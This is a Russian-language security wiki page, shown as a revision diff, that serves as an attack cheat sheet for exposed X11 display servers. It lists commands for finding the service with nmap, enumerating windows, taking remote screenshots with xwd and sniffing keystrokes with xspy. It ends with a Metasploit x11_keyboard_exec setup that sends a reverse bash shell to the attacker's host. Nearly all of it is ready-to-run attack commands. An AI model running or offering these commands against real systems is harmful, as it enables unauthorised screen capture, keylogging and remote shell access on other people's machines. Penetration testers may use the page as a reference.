X11 all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) (Новая страница: « =Разведка= ==Поиск сервиса== ===nmap=== <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > nmap target -p 600…») |
Drakylar (обсуждение | вклад) м (→Разведка) |
||
| Строка 8: | Строка 8: | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
nmap target -p 6000 --script x11-access | nmap target -p 6000 --script x11-access | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | ==Проверка подключения== | ||
| + | |||
| + | ===xdpyinfo=== | ||
| + | |||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | xdpyinfo -display <ip>:<display> | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Версия 09:21, 30 апреля 2020
Содержание
Разведка
Поиск сервиса
nmap
1 nmap target -p 6000 --script x11-access
Проверка подключения
xdpyinfo
1 xdpyinfo -display <ip>:<display>
Информация об окнах
xwininfo
1 xwininfo -root -tree -display target:0
Атаки
Скриншоты
xwd
1 xwd -root -screen -silent -display target:0 > screenshot.xwd
2 convert screenshot.xwd screenshot.png
Сниффер
Сниффать нажатия
xspy
1 xspy target
RCE
x11_keyboard_exec
1 use unix/x11/x11_keyboard_exec
2 set rhost target
3 set payload cmd/unix/reverse_bash
4 set lhost myip
5 set lport myport
6 set time_wait 10
7 run
